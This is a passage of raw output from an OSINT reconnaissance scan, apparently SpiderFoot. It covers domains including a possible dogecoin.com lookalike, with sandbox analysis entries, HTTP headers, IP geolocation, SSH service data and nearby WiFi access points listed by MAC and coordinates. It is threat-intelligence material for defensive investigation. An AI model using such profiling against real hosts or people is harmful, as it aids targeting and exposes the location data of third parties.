"referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 02:46:49 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | 64.226.81.43 |
| 2023-05-12 02:54:15 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://dogeco-in.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ac0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2752"\n "IsoScope_ac0_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ac0_ConnHashTable<2752>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_ac0_IE_EarlyTabStart_0xacc_Mutex"\n "IsoScope_ac0_IESQMMUTEX_0_303"\n "IsoScope_ac0_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\MSIMGSIZECacheMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"156.251.30.43:80"\n "156.251.30.43:443"\n "185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dogeco-in.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"dogeco-in.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* 3.2 RD Twitterfeed" (Indicator: "twitter")\n ".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")\n ".mdi-twitter-box:before {" (Indicator: "twitter")\n ".mdi-twitter-circle:before {" (Indicator: "twitter")\n ".mdi-twitter-retweet:before {" (Indicator: "twitter")\n ".mdi-twitter:before {" (Indicator: "twitter")\n ".mdi-youtube-play:before {" (Indicator: "youtube")\n "a.icon-circle.fa-twitter:hover," (Indicator: "twitter")\n "a.icon-outlined.fa-twitter:hover," (Indicator: "twitter")\n "a.icon-rect.fa-twitter:hover," (Indicator: "twitter")\n "a.icon-rounded.fa-twitter:hover {" (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar44CC.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab44CB.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "doge_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlref_httpdogeco-in.com" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "_249931D0-CB5D-11ED-A05C-0800271774CB_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001476]\n "apk_1_.png" has type "PNG image data 195 x 67 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "_173E45AF-CB5D-11ED-A05C-0800271774CB_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "favicon-32x32_1_.png" has type "PNG image data 32 x 32 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DFB28382624D17019F.TMP" has type "data"- Location: [%TEMP%\\~DFB28382624D17019F.TMP]- [targetUID: 00000000-00002752]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "1SJSDB5U.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1SJSDB5U.txt]- [targetUID: 00000000-00002752]\n "script_1_.js" has type "ASCII text"- [targetUID: N/A]\n "Tar44CC.tmp" has type "data"- Location: [%TEMP%\\Tar44CC.tmp]- [targetUID: 00000000-00001476]\n "23TACHAW.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\23TACHAW.txt]- [targetUID: 00000000-00002752]\n "JWH6TX8Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JWH6TX8Q.txt]- [targetUID: 00000000-00002752]\n "ND45872X.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ND45872X.txt]- [targetUID: 00000000-00002752]\n "doge_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002752]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/K88pR3goAWT7BTt32Z01mxJtnKITppOI_IvcXXDNrsc.woff2"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "C.JgU/0$"\n Pattern match: "dh.dogecofn.com/images/icon-appstore-180x60.png"\n Pattern match: "https://dogecoin.com/favicon-32x32.png"\n Pattern match: "https://dogecoin.com/assets/images/doge.svg"\n Pattern match: "https://dogecoin.com/assets/images/doge.webp"\n Pattern match: "MUID39EA38FB0AC96F4105FF2A240B856E28msn.com/102567574156831101417128039511631022954*"\n Heuristic match: "dogeco-in.com"\n Heuristic match: "GET / HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: dogeco-in.com"\n Pattern match: "https://dogeco-in.com/Accept-Language"\n Pattern match: "http://dogeco-in.com"\n Pattern match: "http://dogeco-in.com/"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025156916108831059172128039511631022954*"\n Pattern match: "MUIDB01CFF38783FC653F08A2E15882786465ieonline.microsoft.com/921666574156831101417127742636631022954*"\n Pattern match: "http://www.iec.chIEC"\n Heuristic match: "scrollTop: $(# + $(this).attr(\'data-custom-scroll-to\')).offset().top"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzBWV49_lSm1NYrwo-zkhivY.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzD0LW-43aMEzIO6XUTLjad8.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzJX5f-9o1vgP2EXwfjgl7AY.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzK-j2U0lmluP9RWlSytm3ho.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzKaRobkAwv3vxw3jMhVENGA.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzOgdm0LZdjqr5-oayXSOefg.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzP8zf_FOSsgRmwsS7Aa9k2w.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/59ZRklaO5bWGqF5A9baEERJtnKITppOI | 185.199.109.153 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5454e7fad90297-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.96.1 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5016a1cc062a51-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.169): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NETGEAR (Net ID: 00:09:5B:D9:B2:92) | 39.0469, -77.4903 |
| 2023-05-12 03:16:21 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ENG', u'country_tld': u'.uk', u'ip': u'2a06:98c1:3120::1', u'currency_name': u'Pound', u'currency': u'GBP', u'country_population': 66488991, u'country_code': u'GB', u'timezone': u'Europe/London', u'city': u'London', u'network': u'2a06:98c1::/32', u'languages': u'en-GB,cy-GB,gd', u'version': u'IPv6', u'latitude': 51.5095, u'in_eu': False, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'United Kingdom', u'country_capital': u'London', u'org': u'CLOUDFLARENET', u'postal': u'EC4N', u'asn': u'AS13335', u'country': u'GB', u'region': u'England', u'longitude': -0.0955, u'country_calling_code': u'+44', u'country_area': 244820.0, u'country_code_iso3': u'GBR'} | 2a06:98c1:3120::1 |
| 2023-05-12 02:44:19 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.110.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MarvellAP8x (Net ID: 00:01:36:16:7E:FB) | 37.7813933,-122.3918002 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01010101coder.github.io | 185.199.111.153 |
| 2023-05-12 03:09:28 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 02:48:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://deployment.hung1001.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e70_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_e70_IESQMMUTEX_0_519"\n "IsoScope_e70_ConnHashTable<3696>_HashTable_Mutex"\n "IsoScope_e70_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e70_IE_EarlyTabStart_0x9e0_Mutex"\n "IsoScope_e70_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3696"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "185.199.110.153:443"\n "104.16.89.20:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"deployment.hung1001.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "deployment.hung1001.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2016 Twitter, Inc." (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC53C.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC52B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabC52B.tmp]- [targetUID: 00000000-00003432]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003432]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpdeployment.hung1001.com" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "_992E54E5-CD8F-11ED-8D0C-080027A296EA_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003432]\n "CabC52B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabC52B.tmp]- [targetUID: 00000000-00003432]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF67EEE4888DD5E710.TMP" has type "data"- Location: [%TEMP%\\~DF67EEE4888DD5E710.TMP]- [targetUID: 00000000-00003696]\n "1BGFX3G1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1BGFX3G1.txt]- [targetUID: 00000000-00003696]\n "0M49AE3M.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0M49AE3M.txt]- [targetUID: 00000000-00003696]\n "~DF88C37032F716BF51.TMP" has type "data"- Location: [%TEMP%\\~DF88C37032F716BF51.TMP]- [targetUID: 00000000-00003696]\n "~DFE99CBDD6FC466412.TMP" has type "data"- Location: [%TEMP%\\~DFE99CBDD6FC466412.TMP]- [targetUID: 00000000-00003696]\n "favicon_6_.png" has type "PNG image data 32 x 32 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "BISQWXD2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BISQWXD2.txt]- [targetUID: 00000000-00003696]\n "XYZCPKU1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XYZCPKU1.txt]- [targetUID: 00000000-00003696]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF5D8C007EB74B1E29.TMP" has type "data"- Location: [%TEMP%\\~DF5D8C007EB74B1E29.TMP]- [targetUID: 00000000-00003696]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "clipboard.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://getbootstrap.com"\n Pattern match: "https://zenorocha.github.io/clipboard.js"\n Pattern match: "https://github.com/twbs/bootstrap/blob/master/LICENSE"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "jquery.org/license"\n Pattern match: "C.JgU/0$"\n Pattern match: "https://hung1001.github.io/assests/images/1.jpg"\n Pattern match: "msdn.microsoft.com/en-us/library/cc722477.aspx"\n Pattern match: "cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css"\n Pattern match: "cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/js/bootstrap.min.js"\n Pattern match: "cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js"\n Pattern match: "cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"\n Pattern match: "MUID146012C6BB7767E008770024BAF36692msn.com/1025385438284831101987262314288931023516*"\n Heuristic match: "cdn.jsdelivr.net"\n Heuristic match: "deployment.hung1001.com"\n Heuristic match: "GET / HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: deployment.hung1001.com"\n Pattern match: "https://deployment.hung1001.com/Accept-Language"\n Pattern match: "http://deployment.hung1001.com"\n Pattern match: "http://deployment.hung1001.com/"\n Pattern match: "isdomainmigratedtruewww.msn.com/102545283507231059743262314288931023516*"\n Pattern match: "MUIDB34F1697C9B5A69502FD47B9E9ADE6822ieonline.microsoft.com/9216385438284831101987262001788931023516*"\n Pattern match: "msdn.microsoft.com/en-us/library/windows/desktop/ms717801(v=vs.85).aspx"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "SUIDMmicrosoft.com/9216372189363231023633262001788931023516*MUID34F1697C9B5A69502FD47B9E9ADE6822microsoft.com/1025385438284831101987262001788931023516*_EDGE_V1microsoft.com/9216385438284831101987262017413931023516*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "SUIDMmicrosoft.com/9216372189363231023633262001788931023516*MUID34F | 185.199.110.153 |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.212 | 104.196.30.220 |
| 2023-05-12 02:44:21 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.108.153 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | chacha20-poly1305@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", 